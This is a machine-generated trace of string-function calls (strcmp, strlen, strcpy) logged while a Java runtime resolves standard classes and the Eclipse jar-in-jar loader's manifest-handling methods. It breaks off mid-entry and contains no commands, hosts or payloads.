strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.153] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.153] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.153] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.153] strcmp (_Str1="", _Str2="") returned 0 [0018.153] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.153] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.154] strcmp (_Str1="append", _Str2="") returned 1 [0018.154] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.154] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.154] strcmp (_Str1="append", _Str2="") returned 1 [0018.154] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.154] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.154] strcmp (_Str1="toString", _Str2="") returned 1 [0018.154] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.154] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.154] strcmp (_Str1="", _Str2="") returned 0 [0018.154] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.154] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.155] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.155] strlen (_Str="java/net/URLClassLoader") returned 0x17 [0018.155] strcpy (in: _Dest=0xb5f020, _Source="java/net/URLClassLoader" | out: _Dest="java/net/URLClassLoader") returned="java/net/URLClassLoader" [0018.155] strcmp (_Str1="", _Str2="") returned 0 [0018.155] strcmp (_Str1="java/net/URLClassLoader", _Str2="java/net/URLClassLoader") returned 0 [0018.155] strcmp (_Str1="java/net/URLClassLoader", _Str2="java/net/URLClassLoader") returned 0 [0018.155] strcmp (_Str1="currentThread", _Str2="") returned 1 [0018.155] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.155] strcmp (_Str1="setContextClassLoader", _Str2="") returned 1 [0018.155] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.155] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.155] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.156] strcmp (_Str1="forName", _Str2="") returned 1 [0018.156] strlen (_Str="java/lang/Class") returned 0xf [0018.156] strcpy (in: _Dest=0xb67f00, _Source="java/lang/Class" | out: _Dest="java/lang/Class") returned="java/lang/Class" [0018.156] strcmp (_Str1="java/lang/Class", _Str2="java/lang/Class") returned 0 [0018.156] strcmp (_Str1="getClass", _Str2="") returned 1 [0018.156] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.156] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.156] strcmp (_Str1="getMethod", _Str2="") returned 1 [0018.156] strcmp (_Str1="java/lang/Class", _Str2="java/lang/Class") returned 0 [0018.156] strcmp (_Str1="java/lang/Class", _Str2="java/lang/Class") returned 0 [0018.157] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.157] strcmp (_Str1="invoke", _Str2="") returned 1 [0018.157] strlen (_Str="java/lang/reflect/Method") returned 0x18 [0018.157] strcpy (in: _Dest=0xace610, _Source="java/lang/reflect/Method" | out: _Dest="java/lang/reflect/Method") returned="java/lang/reflect/Method" [0018.157] strcmp (_Str1="java/lang/reflect/Method", _Str2="java/lang/reflect/Method") returned 0 [0018.157] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.157] strlen (_Str="") returned 0x0 [0018.157] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.157] strlen (_Str="A") returned 0x1 [0018.158] strlen (_Str="") returned 0x0 [0018.158] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.158] strlen (_Str="A") returned 0x1 [0018.158] strlen (_Str="java/lang/ClassLoader") returned 0x15 [0018.158] strcpy (in: _Dest=0xb5f040, _Source="java/lang/ClassLoader" | out: _Dest="java/lang/ClassLoader") returned="java/lang/ClassLoader" [0018.158] strlen (_Str="A") returned 0x1 [0018.158] strlen (_Str="") returned 0x0 [0018.158] strlen (_Str="1") returned 0x1 [0018.158] strlen (_Str="") returned 0x0 [0018.158] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.159] strlen (_Str="@A") returned 0x2 [0018.159] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.159] strlen (_Str="java/net/URLStreamHandlerFactory") returned 0x20 [0018.159] strcpy (in: _Dest=0xb4d578, _Source="java/net/URLStreamHandlerFactory" | out: _Dest="java/net/URLStreamHandlerFactory") returned="java/net/URLStreamHandlerFactory" [0018.159] strlen (_Str="A") returned 0x1 [0018.159] strcmp (_Str1="java/net/URLStreamHandlerFactory", _Str2="java/net/URLStreamHandlerFactory") returned 0 [0018.160] strlen (_Str="java/net/URLStreamHandlerFactory") returned 0x20 [0018.160] strlen (_Str="") returned 0x0 [0018.160] strlen (_Str="A") returned 0x1 [0018.160] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.160] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.160] strlen (_Str="[?]") returned 0x3 [0018.160] strlen (_Str="I") returned 0x1 [0018.161] strlen (_Str="A") returned 0x1 [0018.161] strlen (_Str="") returned 0x0 [0018.161] strlen (_Str="I") returned 0x1 [0018.161] strlen (_Str="") returned 0x0 [0018.161] strlen (_Str="") returned 0x0 [0018.161] strlen (_Str="") returned 0x0 [0018.161] strlen (_Str="A") returned 0x1 [0018.161] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.161] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.161] strlen (_Str="[?]") returned 0x3 [0018.161] strlen (_Str="II") returned 0x2 [0018.161] strlen (_Str="") returned 0x0 [0018.161] strlen (_Str="1") returned 0x1 [0018.161] strlen (_Str="") returned 0x0 [0018.161] strlen (_Str="") returned 0x0 [0018.161] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.162] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.162] strlen (_Str="@AA") returned 0x3 [0018.162] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.162] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.162] strlen (_Str="A") returned 0x1 [0018.162] strlen (_Str="") returned 0x0 [0018.162] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.162] strlen (_Str="") returned 0x0 [0018.163] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.163] strlen (_Str="AA") returned 0x2 [0018.163] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.163] strlen (_Str="java/lang/ClassLoader") returned 0x15 [0018.164] strlen (_Str="java/net/URLClassLoader") returned 0x17 [0018.164] strlen (_Str="") returned 0x0 [0018.164] strlen (_Str="A") returned 0x1 [0018.164] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.164] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.164] strlen (_Str="") returned 0x0 [0018.165] strlen (_Str="") returned 0x0 [0018.165] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.165] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.165] strlen (_Str="AIA") returned 0x3 [0018.165] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.165] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.165] strcmp (_Str1="java/lang/Class", _Str2="java/lang/Class") returned 0 [0018.165] strlen (_Str="A") returned 0x1 [0018.165] strlen (_Str="") returned 0x0 [0018.165] strlen (_Str="") returned 0x0 [0018.165] strlen (_Str="") returned 0x0 [0018.166] strlen (_Str="I") returned 0x1 [0018.166] strlen (_Str="1") returned 0x1 [0018.166] strlen (_Str="") returned 0x0 [0018.166] strlen (_Str="") returned 0x0 [0018.166] strlen (_Str="A") returned 0x1 [0018.166] strcmp (_Str1="java/lang/Class", _Str2="java/lang/Class") returned 0 [0018.166] strlen (_Str="[A]IA") returned 0x5 [0018.166] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.166] strcmp (_Str1="java/lang/Class", _Str2="java/lang/Class") returned 0 [0018.166] strlen (_Str="AAA") returned 0x3 [0018.166] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.166] strcmp (_Str1="java/lang/Class", _Str2="java/lang/Class") returned 0 [0018.167] strcmp (_Str1="java/lang/reflect/Method", _Str2="java/lang/reflect/Method") returned 0 [0018.167] strlen (_Str="A") returned 0x1 [0018.167] strlen (_Str="") returned 0x0 [0018.167] strlen (_Str="") returned 0x0 [0018.167] strlen (_Str="") returned 0x0 [0018.167] strlen (_Str="I") returned 0x1 [0018.167] strlen (_Str="1") returned 0x1 [0018.167] strlen (_Str="") returned 0x0 [0018.167] strlen (_Str="") returned 0x0 [0018.167] strlen (_Str="[A]IA") returned 0x5 [0018.167] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.168] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.168] strlen (_Str="AAA") returned 0x3 [0018.168] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.168] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.168] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.168] strlen (_Str="1") returned 0x1 [0018.168] strlen (_Str="") returned 0x0 [0018.168] strlen (_Str="") returned 0x0 [0018.168] strlen (_Str="A") returned 0x1 [0018.168] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.168] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.168] strlen (_Str="") returned 0x0 [0018.168] strlen (_Str="[A]I") returned 0x4 [0018.169] strlen (_Str="A") returned 0x1 [0018.169] strlen (_Str="") returned 0x0 [0018.169] strlen (_Str="") returned 0x0 [0018.169] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.169] strlen (_Str="AA") returned 0x2 [0018.169] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.169] strlen (_Str="I") returned 0x1 [0018.169] strlen (_Str="") returned 0x0 [0018.169] strlen (_Str="") returned 0x0 [0018.169] strlen (_Str="") returned 0x0 [0018.169] strlen (_Str="1") returned 0x1 [0018.169] strlen (_Str="") returned 0x0 [0018.169] strlen (_Str="1") returned 0x1 [0018.169] strlen (_Str="") returned 0x0 [0018.170] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.170] strlen (_Str="@A") returned 0x2 [0018.170] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.170] strlen (_Str="") returned 0x0 [0018.170] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.170] strlen (_Str="AA") returned 0x2 [0018.170] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.170] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.170] strlen (_Str="A") returned 0x1 [0018.171] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.171] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.171] strlen (_Str="@A") returned 0x2 [0018.171] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.171] strlen (_Str="[A]IA") returned 0x5 [0018.171] strlen (_Str="") returned 0x0 [0018.171] strlen (_Str="") returned 0x0 [0018.171] strlen (_Str="") returned 0x0 [0018.171] strlen (_Str="") returned 0x0 [0018.171] strlen (_Str="1") returned 0x1 [0018.171] strlen (_Str="") returned 0x0 [0018.171] strlen (_Str="1") returned 0x1 [0018.171] strlen (_Str="") returned 0x0 [0018.172] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.172] strlen (_Str="@A") returned 0x2 [0018.172] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.172] strlen (_Str="") returned 0x0 [0018.172] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.172] strlen (_Str="AA") returned 0x2 [0018.172] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.172] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.173] strlen (_Str="") returned 0x0 [0018.173] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.173] strlen (_Str="AA") returned 0x2 [0018.173] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.173] strcmp (_Str1="java/lang/StringBuffer", _Str2="java/lang/StringBuffer") returned 0 [0018.173] strlen (_Str="A") returned 0x1 [0018.173] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.173] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.173] strlen (_Str="@A") returned 0x2 [0018.174] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.174] strlen (_Str="[A]IA") returned 0x5 [0018.174] strlen (_Str="") returned 0x0 [0018.174] strcmp (_Str1="", _Str2="") returned 0 [0018.174] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.174] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.175] strlen (_Str="") returned 0x0 [0018.175] strlen (_Str="@") returned 0x1 [0018.175] strlen (_Str="") returned 0x0 [0018.175] strlen (_Str="java/util/ArrayList") returned 0x13 [0018.175] strcpy (in: _Dest=0xb5f060, _Source="java/util/ArrayList" | out: _Dest="java/util/ArrayList") returned="java/util/ArrayList" [0018.175] strcmp (_Str1="", _Str2="") returned 0 [0018.175] strcmp (_Str1="java/util/ArrayList", _Str2="java/util/ArrayList") returned 0 [0018.176] strcmp (_Str1="java/util/ArrayList", _Str2="java/util/ArrayList") returned 0 [0018.176] strcmp (_Str1="indexOf", _Str2="") returned 1 [0018.176] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.176] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.176] strcmp (_Str1="length", _Str2="") returned 1 [0018.176] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.176] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.176] strcmp (_Str1="substring", _Str2="") returned 1 [0018.176] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.177] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.177] strcmp (_Str1="add", _Str2="") returned 1 [0018.177] strlen (_Str="java/util/List") returned 0xe [0018.177] strcpy (in: _Dest=0xb68098, _Source="java/util/List" | out: _Dest="java/util/List") returned="java/util/List" [0018.177] strcmp (_Str1="length", _Str2="") returned 1 [0018.177] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.177] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.177] strcmp (_Str1="size", _Str2="") returned 1 [0018.177] strcmp (_Str1="java/util/List", _Str2="java/util/List") returned 0 [0018.177] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.178] strcmp (_Str1="toArray", _Str2="") returned 1 [0018.178] strcmp (_Str1="java/util/List", _Str2="java/util/List") returned 0 [0018.178] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.178] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.178] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.178] strlen (_Str="") returned 0x0 [0018.178] strlen (_Str="A") returned 0x1 [0018.178] strlen (_Str="") returned 0x0 [0018.178] strlen (_Str="A") returned 0x1 [0018.178] strlen (_Str="") returned 0x0 [0018.178] strlen (_Str="1") returned 0x1 [0018.179] strlen (_Str="@") returned 0x1 [0018.179] strlen (_Str="A") returned 0x1 [0018.179] strlen (_Str="") returned 0x0 [0018.179] strlen (_Str="I") returned 0x1 [0018.179] strlen (_Str="") returned 0x0 [0018.179] strlen (_Str="") returned 0x0 [0018.179] strlen (_Str="") returned 0x0 [0018.179] strlen (_Str="A") returned 0x1 [0018.179] strlen (_Str="II") returned 0x2 [0018.179] strlen (_Str="") returned 0x0 [0018.179] strlen (_Str="") returned 0x0 [0018.179] strlen (_Str="A") returned 0x1 [0018.180] strlen (_Str="java/util/List") returned 0xe [0018.180] strlen (_Str="I") returned 0x1 [0018.180] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.181] strlen (_Str="AA") returned 0x2 [0018.181] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.181] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.181] strlen (_Str="A") returned 0x1 [0018.181] strlen (_Str="A") returned 0x1 [0018.181] strlen (_Str="") returned 0x0 [0018.181] strlen (_Str="") returned 0x0 [0018.181] strlen (_Str="") returned 0x0 [0018.181] strlen (_Str="AII") returned 0x3 [0018.181] strlen (_Str="I") returned 0x1 [0018.181] strlen (_Str="") returned 0x0 [0018.182] strlen (_Str="") returned 0x0 [0018.182] strlen (_Str="II") returned 0x2 [0018.182] strlen (_Str="") returned 0x0 [0018.182] strlen (_Str="A") returned 0x1 [0018.182] strlen (_Str="I") returned 0x1 [0018.182] strlen (_Str="") returned 0x0 [0018.182] strlen (_Str="") returned 0x0 [0018.182] strlen (_Str="II") returned 0x2 [0018.182] strlen (_Str="") returned 0x0 [0018.182] strlen (_Str="") returned 0x0 [0018.182] strlen (_Str="") returned 0x0 [0018.182] strlen (_Str="") returned 0x0 [0018.182] strlen (_Str="AII") returned 0x3 [0018.186] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.186] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.186] strlen (_Str="AA") returned 0x2 [0018.187] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.187] strlen (_Str="1") returned 0x1 [0018.187] strlen (_Str="") returned 0x0 [0018.187] strlen (_Str="") returned 0x0 [0018.187] strlen (_Str="II") returned 0x2 [0018.187] strlen (_Str="I") returned 0x1 [0018.187] strcmp (_Str1="currentThread", _Str2="") returned 1 [0018.187] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.187] strcmp (_Str1="getContextClassLoader", _Str2="") returned 1 [0018.188] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.188] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.188] strcmp (_Str1="getResources", _Str2="") returned 1 [0018.188] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.188] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.188] strcmp (_Str1="nextElement", _Str2="") returned 1 [0018.188] strlen (_Str="java/util/Enumeration") returned 0x15 [0018.188] strcpy (in: _Dest=0xb5f080, _Source="java/util/Enumeration" | out: _Dest="java/util/Enumeration") returned="java/util/Enumeration" [0018.188] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.188] strcmp (_Str1="openStream", _Str2="") returned 1 [0018.188] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.189] strcmp (_Str1="java/net/URL", _Str2="java/net/URL") returned 0 [0018.189] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.189] strcmp (_Str1="", _Str2="") returned 0 [0018.189] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.189] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.189] strlen (_Str="java/util/jar/Manifest") returned 0x16 [0018.189] strcpy (in: _Dest=0xb5f0a0, _Source="java/util/jar/Manifest" | out: _Dest="java/util/jar/Manifest") returned="java/util/jar/Manifest" [0018.189] strcmp (_Str1="", _Str2="") returned 0 [0018.189] strcmp (_Str1="java/util/jar/Manifest", _Str2="java/util/jar/Manifest") returned 0 [0018.189] strcmp (_Str1="java/util/jar/Manifest", _Str2="java/util/jar/Manifest") returned 0 [0018.189] strcmp (_Str1="getMainAttributes", _Str2="") returned 1 [0018.190] strcmp (_Str1="java/util/jar/Manifest", _Str2="java/util/jar/Manifest") returned 0 [0018.190] strcmp (_Str1="java/util/jar/Manifest", _Str2="java/util/jar/Manifest") returned 0 [0018.190] strcmp (_Str1="getValue", _Str2="") returned 1 [0018.190] strlen (_Str="java/util/jar/Attributes") returned 0x18 [0018.190] strcpy (in: _Dest=0xace638, _Source="java/util/jar/Attributes" | out: _Dest="java/util/jar/Attributes") returned="java/util/jar/Attributes" [0018.190] strcmp (_Str1="java/util/jar/Attributes", _Str2="java/util/jar/Attributes") returned 0 [0018.190] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.190] strcmp (_Str1="getValue", _Str2="") returned 1 [0018.190] strcmp (_Str1="java/util/jar/Attributes", _Str2="java/util/jar/Attributes") returned 0 [0018.190] strcmp (_Str1="java/util/jar/Attributes", _Str2="java/util/jar/Attributes") returned 0 [0018.191] strcmp (_Str1="splitSpaces", _Str2="") returned 1 [0018.191] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader") returned 0 [0018.191] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.191] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.191] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.191] strcmp (_Str1="trim", _Str2="") returned 1 [0018.191] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.191] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.191] strcmp (_Str1="equals", _Str2="") returned 1 [0018.191] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.191] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.192] strcmp (_Str1="hasMoreElements", _Str2="") returned 1 [0018.192] strcmp (_Str1="java/util/Enumeration", _Str2="java/util/Enumeration") returned 0 [0018.192] strcmp (_Str1="println", _Str2="") returned 1 [0018.192] strlen (_Str="java/io/PrintStream") returned 0x13 [0018.192] strcpy (in: _Dest=0xb5f0c0, _Source="java/io/PrintStream" | out: _Dest="java/io/PrintStream") returned="java/io/PrintStream" [0018.192] strcmp (_Str1="java/io/PrintStream", _Str2="java/io/PrintStream") returned 0 [0018.192] strlen (_Str="java/lang/Exception") returned 0x13 [0018.192] strcpy (in: _Dest=0xb5f0e0, _Source="java/lang/Exception" | out: _Dest="java/lang/Exception") returned="java/lang/Exception" [0018.193] strlen (_Str="java/lang/Throwable") returned 0x13 [0018.193] strlen (_Str="java/lang/Exception") returned 0x13 [0018.194] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.194] strlen (_Str="") returned 0x0 [0018.194] strcmp (_Str1="java/lang/Thread", _Str2="java/lang/Thread") returned 0 [0018.194] strlen (_Str="A") returned 0x1 [0018.194] strcmp (_Str1="java/lang/ClassLoader", _Str2="java/lang/ClassLoader") returned 0 [0018.194] strlen (_Str="") returned 0x0 [0018.195] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.195] strlen (_Str="AA") returned 0x2 [0018.195] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.195] strcmp (_Str1="java/util/Enumeration", _Str2="java/util/Enumeration") returned 0 [0018.195] strlen (_Str="A") returned 0x1 [0018.195] strlen (_Str="") returned 0x0 [0018.195] strlen (_Str="") returned 0x0 [0018.195] strlen (_Str="A") returned 0x1 [0018.195] strlen (_Str="I") returned 0x1 [0018.195] strlen (_Str="") returned 0x0 [0018.196] strcmp (_Str1="java/io/PrintStream", _Str2="java/io/PrintStream") returned 0 [0018.196] strlen (_Str="") returned 0x0 [0018.196] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.196] strlen (_Str="AA") returned 0x2 [0018.196] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.196] strlen (_Str="") returned 0x0 [0018.196] strlen (_Str="A") returned 0x1 [0018.196] strlen (_Str="") returned 0x0 [0018.196] strlen (_Str="A") returned 0x1 [0018.196] strcmp (_Str1="java/lang/Object", _Str2="java/lang/Object") returned 0 [0018.197] strlen (_Str="A") returned 0x1 [0018.197] strlen (_Str="A") returned 0x1 [0018.197] strlen (_Str="") returned 0x0 [0018.197] strlen (_Str="A") returned 0x1 [0018.197] strlen (_Str="java/io/InputStream") returned 0x13 [0018.197] strcpy (in: _Dest=0xb5f100, _Source="java/io/InputStream" | out: _Dest="java/io/InputStream") returned="java/io/InputStream" [0018.197] strlen (_Str="A") returned 0x1 [0018.197] strlen (_Str="") returned 0x0 [0018.197] strlen (_Str="A") returned 0x1 [0018.197] strlen (_Str="") returned 0x0 [0018.197] strlen (_Str="1") returned 0x1 [0018.197] strlen (_Str="") returned 0x0 [0018.197] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.198] strlen (_Str="@A") returned 0x2 [0018.198] strcmp (_Str1="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo", _Str2="org/eclipse/jdt/internal/jarinjarloader/JarRsrcLoader$ManifestInfo") returned 0 [0018.198] strlen (_Str="A") returned 0x1 [0018.198] strlen (_Str="") returned 0x0 [0018.198] strlen (_Str="1") returned 0x1 [0018.198] strlen (_Str="") returned 0x0 [0018.198] strcmp (_Str1="java/io/InputStream", _Str2="java/io/InputStream") returned 0 [0018.198] strlen (_Str="@A") returned 0x2 [0018.198] strcmp (_Str1="java/io/InputStream", _Str2="java/io/InputStream") returned 0 [0018.198] strlen (_Str="A") returned 0x1 [0018.198] strlen (_Str="") returned 0x0 [0018.199] strlen (_Str="A") returned 0x1 [0018.199] strcmp (_Str1="java/util/jar/Attributes", _Str2="java/util/jar/Attributes") returned 0 [0018.199] strlen (_Str="A") returned 0x1 [0018.199] strlen (_Str="") returned 0x0 [0018.199] strlen (_Str="") returned 0x0 [0018.199] strlen (_Str="") returned 0x0 [0018.199] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.199] strlen (_Str="AA") returned 0x2 [0018.199] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.199] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.200] strcmp (_Str1="java/lang/String", _Str2="java/lang/String") returned 0 [0018.200] strlen (_Str="AA") returned 0x2 [0018.200] strcmp 